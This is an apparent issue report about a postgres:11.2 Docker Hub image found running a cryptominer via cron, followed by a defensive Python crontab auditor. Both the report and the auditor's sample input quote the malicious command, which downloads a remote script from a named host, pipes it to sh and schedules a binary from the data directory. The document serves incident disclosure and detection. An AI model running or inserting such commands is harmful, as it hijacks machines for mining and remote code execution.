
Compromised image in docker-hub #664

@efagerberg

Description


Postgres 11.2 AMD64 image seems to be compromised and should be immediately removed from dockerhub. This image executes a cron job to mine cryptocurrencies, and possibly more. Might be worth auditing all variants in case.

cmd: echo "*/30 * * * * /var/lib/postgresql/data/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a

We noticed on our host machine that there was a process running a suspicious script, ./oka. Once we looked inside the container, this process was coming from a 2 day old postgres:11.2 docker container. We had to nuke the image and fs mounts, so nothing is left over, and rerunning locally I am not able to immediately see the same effect; it could be that the script only runs after a certain amount of time.
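A defender-side check for the kind of crontab entries reported above, added here as an example and not part of this issue or of the postgres image: it parses crontab text and flags commands that pipe a remote download into a shell or execute a file stored under PGDATA. The two entries from the report plus one benign line are embedded as constructed sample input; the PGDATA path is the official image's default.

```python
import re
from dataclasses import dataclass

# Constructed sample: the two entries reported in this issue plus a benign maintenance job.
SAMPLE_CRONTAB = """\
*/30 * * * * /var/lib/postgresql/data/./oka
* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh
0 3 * * * /usr/bin/vacuumdb --all
"""

DATA_DIR = "/var/lib/postgresql/data"   # default PGDATA of the official postgres image
CRON_FIELDS = 5                          # minute hour day-of-month month day-of-week

# Behaviours a database container's crontab should never show.
REMOTE_PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b")
EXEC_FROM_DATA_DIR = re.compile(re.escape(DATA_DIR) + r"/")


@dataclass
class Finding:
    entry: str
    reasons: list[str]


def parse_crontab_line(line):
    """Split one crontab line into (schedule, command); None for blanks/comments."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    parts = stripped.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None  # schedule with no command: nothing would run
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def audit_crontab(text):
    """Return a Finding for every entry matching a suspicious pattern."""
    findings = []
    for line in text.splitlines():
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        _, command = parsed
        reasons = []
        if REMOTE_PIPE_TO_SHELL.search(command):
            reasons.append("downloads remote content and pipes it to a shell")
        if EXEC_FROM_DATA_DIR.search(command):
            reasons.append("executes a file stored under PGDATA")
        if reasons:
            findings.append(Finding(line.strip(), reasons))
    return findings
```

Feed it the output of `docker exec <container> crontab -l` for a running database container; the official image does not schedule any cron jobs, so any entry at all deserves a look, and these two patterns are the ones worth alerting on first.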

Labels: question (Usability question, not directly related to an error with the image)
